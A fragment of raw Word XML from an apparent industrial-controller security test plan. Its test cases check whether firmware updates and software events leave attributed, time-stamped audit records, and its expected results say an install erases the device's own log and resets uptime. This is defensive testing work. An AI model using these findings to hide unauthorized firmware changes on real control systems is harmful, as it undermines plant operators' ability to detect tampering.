            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16F02978" w14:textId="4B74EF02" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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Enumerate the software-event evidence that exists: Error Log, /firmware/version, I&amp;M0 SOFTWARE_REVISION at baseline </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1673919A" w14:textId="6F6DA3BE" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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CR 2.8 partial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC52733" w14:textId="77777777" w:rsidR="000B6DC9"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6AA56C7A" w14:textId="5C2FA476" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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673F729D" w14:textId="106E154B"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3363F631" w14:textId="75E22750" w:rsidR="00B97F60"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Perform a legitimate </w:t>
            </w:r>
            <w:r w:rsidR="00B97F60" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FW update; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6826A1C1" w14:textId="5D021171" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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capture whether a retained, time-stamped, attributed record survives the install reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1858E8" w14:textId="32B351D8" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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 (self-erasing install) + G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A17966C" w14:textId="1E0F9874" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F2746B" w14:textId="69BD2BA2" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32DAA4F6" w14:textId="77777777" w:rsidR="00670F7C"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Compare evidence footprints of a legitimate update vs the modified/unsigned image installed in TC-RQ005-03; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DFB47C" w14:textId="37B4EC51" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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check whether the log distinguishes them</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611BBF55" w14:textId="280145D6" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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 (evidence cannot classify</w:t>
            </w:r>
            <w:r w:rsidR="006E3D06" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0087F8E6" w14:textId="5EDEC408" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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ATT&amp;CK for ICS T0872; OWASP ISTG-FW[UPDT]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B643AEF" w14:textId="24421B9E"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A1A0F1" w14:textId="00C0098D" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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across the install cold start (reuse TC-RQ003-04 method): uptime resets, no absolute timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63A8178A" w14:textId="542CFDFD" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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G-1/CR 2.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429BE8BE" w14:textId="623B1A85" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="723C922B" w14:textId="7C461BEC" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF15222" w14:textId="544010D8" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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the production-gated FIT path (/fit/setfit, WO/P); confirm exclusion produces no log entry (reuse RQ-003 Scenario 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FBADC9" w14:textId="77777777" w:rsidR="004577E5"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Validates EDR 2.13; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E8E51A" w14:textId="27243B17" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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confirms G-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D67F80A" w14:textId="77777777" w:rsidR="00D31F74"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§4.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A9EEF0" w14:textId="6159CF06" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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FSTM / ISTG-PHY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A403484" w14:textId="56F164B3" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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bl>
    <w:p w14:paraId="4918C522" w14:textId="77777777" w:rsidR="00227438" w:rsidRPr="006D5B99" w:rsidRDefault="00227438" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4266E820" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E3EED1" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCC286" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0D5D9F" w14:textId="3ABD111B" w:rsidR="00E12124" w:rsidRPr="006D5B99" w:rsidRDefault="00E12124" w:rsidP="00E12124">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00925851">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ008-01 - Software-Event Evidence Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DA552" w14:textId="77777777" w:rsidR="007540B2" w:rsidRPr="006D5B99" w:rsidRDefault="007540B2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC1F40D"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6DF349A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15C57EB6" w14:textId="24EE5E75" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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RQ-008 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.8 / CR 6.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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7A9F8CC5" w14:textId="1AD5137B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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0958B41A" w14:textId="0523246B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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0B5A3696" w14:textId="2B102B74" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99"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084516DD"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error log and firmware/software-revision records at a known-good baseline.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D8ADF6C"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Trigger a benign self-detected software event.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33AA197A" w14:textId="77777777" w:rsidR="004720F6"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Re-read; confirm an audit entry appears.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B01F92" w14:textId="1FA0336A" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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entry for identity and absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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352B08FC" w14:textId="77777777" w:rsidR="004720F6"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log and software records are readable and the induced event </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">is captured. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4037FB49" w14:textId="3FFF0336" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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if no entry carries actor identity or absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0237367E" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B322876"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353990DF"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6F321" w14:textId="25E099E9" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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TC-RQ008-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E3D51" w:rsidRPr="006D5B99"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8E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D51">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6154CCAF" w14:textId="63B48696" w:rsidR="008E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51"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(curl), TIA laptop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E3D51" w:rsidRPr="006D5B99"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8E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D51">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64404460" w14:textId="08F91EA0" w:rsidR="008E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D5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E3D51" w:rsidRPr="006D5B99"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8E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D51">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581889EF"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0707D4D" w14:textId="0D8999B1"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cm_rq008-01_baseline.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3683C6E5"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http://$SRIO/firmware/version/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78720373"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48FB3ED3"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p>
          <w:p w14:paraId="69A5FBCB"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Trigger a benign, self-detected software event, e.g. a brief SysCom</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A277FBE" w14:textId="7B0E8FDC" w:rsidR="008E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="00853E4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interruption</w:t>
            </w:r>
            <w:r w:rsidR="00853E46" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> short-circuit method from TC-RQ003-04.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485C5CC3" w14:textId="77777777"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p>
          <w:p w14:paraId="1A5F7C49" w14:textId="2A9EE5CB" w:rsidR="008E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D5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cm_rq008-01_after_event.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4159CE4C" w14:textId="77777777" w:rsidR="008E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51"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cm_rq008-01_baseline.json cm_rq008-01_after_event.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B9E486C" w14:textId="77777777" w:rsidR="00C36495" w:rsidRPr="006D5B99" w:rsidRDefault="00C36495"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p>
          <w:p w14:paraId="2D909B25" w14:textId="08B5700E" w:rsidR="00C36495" w:rsidRPr="006D5B99" w:rsidRDefault="00E90502" w:rsidP="008E3D5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w:t>
            </w:r>
            <w:r w:rsidR="00C36495" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I&amp;</w:t>
            </w:r>
            <w:r w:rsidR="00853E46" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E3D51" w:rsidRPr="006D5B99"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8E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D51">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4795CD37" w14:textId="2C5A3CFE" w:rsidR="008E3D51" w:rsidRPr="006D5B99" w:rsidRDefault="008E3D51" w:rsidP="008E3D51">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6D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected: an entry is created, but without actor identity and without an absolute timestamp (only an uptime reference).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="568ECF38" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329A1065" w14:textId="15610487" w:rsidR="000409F3" w:rsidRPr="006D5B99" w:rsidRDefault="00171DD3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ008-02 -  Self-Erasing Firmware Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02160AA1" w14:textId="77777777" w:rsidR="000409F3" w:rsidRPr="006D5B99" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1384E0FE" w14:textId="77777777" w:rsidR="006135F0" w:rsidRPr="006D5B99" w:rsidRDefault="006135F0" w:rsidP="006135F0">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6D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1426189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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="671930F5" w14:textId="4AE0B0FD" w:rsidR="006135F0" w:rsidRPr="006D5B99"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RQ-008 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.9 / CR 2.11 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10C21F55" w14:textId="4E77B19B" w:rsidR="006135F0" w:rsidRPr="006D5B99"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6135F0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA9A593" w14:textId="5F1B23EF" w:rsidR="006135F0" w:rsidRPr="006D5B99"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6135F0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D39911" w14:textId="1C53F050" w:rsidR="006135F0" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01030E7A"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audit log and uptime reference.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4EFDCA" w14:textId="7D4BC5C3"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CD6281" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> firmware update (enter update state, upload, install).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6B1351" w14:textId="77777777" w:rsidR="00E2375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the install restart, re-read the audit log and uptime reference.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D85EFC7" w14:textId="48D0BCDA" w:rsidR="006135F0" w:rsidRPr="006D5B99"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any persistent, time-stamped record of the install remains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1446F914" w14:textId="6B13D1B1" w:rsidR="003B22AC"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F55002" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B184E1" w14:textId="518C73E5" w:rsidR="00E2375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post-install log cleared and uptime reset </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the install has erased its own evidence </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
          </w:p>
